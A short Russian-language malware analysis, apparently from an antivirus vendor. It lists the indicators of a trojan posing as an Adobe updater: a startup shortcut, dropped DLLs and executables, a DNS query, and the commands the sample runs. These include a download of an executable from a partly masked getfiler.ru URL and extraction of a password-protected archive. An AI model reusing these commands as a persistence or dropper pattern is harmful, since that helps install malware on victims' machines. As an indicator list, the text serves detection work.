Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\adobe-updater.lnk
- '%PROGRAM_FILES%\Adobe\5181797.exe' -cN --waitretry=3 -t3 -T10 --output-document="%PROGRAM_FILES%\Adobe\~lmzybkxjntg.exe" "http://se####.getfiler.ru/get_file?si##################################################################################################################################################################################################################"
- '%TEMP%\deleter.exe' /sfx=<Полный путь к вирусу>
- '%TEMP%\nsp2.tmp\7z.exe' x "%PROGRAM_FILES%\Adobe\adobe-updater.7z" -o"%PROGRAM_FILES%\Adobe" "adobe-updater.exe" -aoa -y -padobe
- '%PROGRAM_FILES%\Adobe\adobe-updater.exe' -25181797
- %TEMP%\nsp2.tmp\System.dll
- %PROGRAM_FILES%\Adobe\adobe-updater.exe
- %TEMP%\deleter.exe
- %PROGRAM_FILES%\Adobe\downloader.exe
- %TEMP%\nsp2.tmp\execDos.dll
- %PROGRAM_FILES%\Adobe\adobe-updater.7z
- %TEMP%\nsp2.tmp\KillProc.dll
- %TEMP%\nsp2.tmp\7z.dll
- %TEMP%\nsp2.tmp\7z.exe
- %TEMP%\nsp2.tmp\execDos.dll
- %TEMP%\nsp2.tmp\KillProc.dll
- %TEMP%\nsp2.tmp\System.dll
- %PROGRAM_FILES%\Adobe\adobe-updater.7z
- %TEMP%\nsp2.tmp\7z.dll
- %TEMP%\nsp2.tmp\7z.exe
- %PROGRAM_FILES%\Adobe\downloader.exe в %PROGRAM_FILES%\Adobe\5181797.exe
- DNS ASK se####.getfiler.ru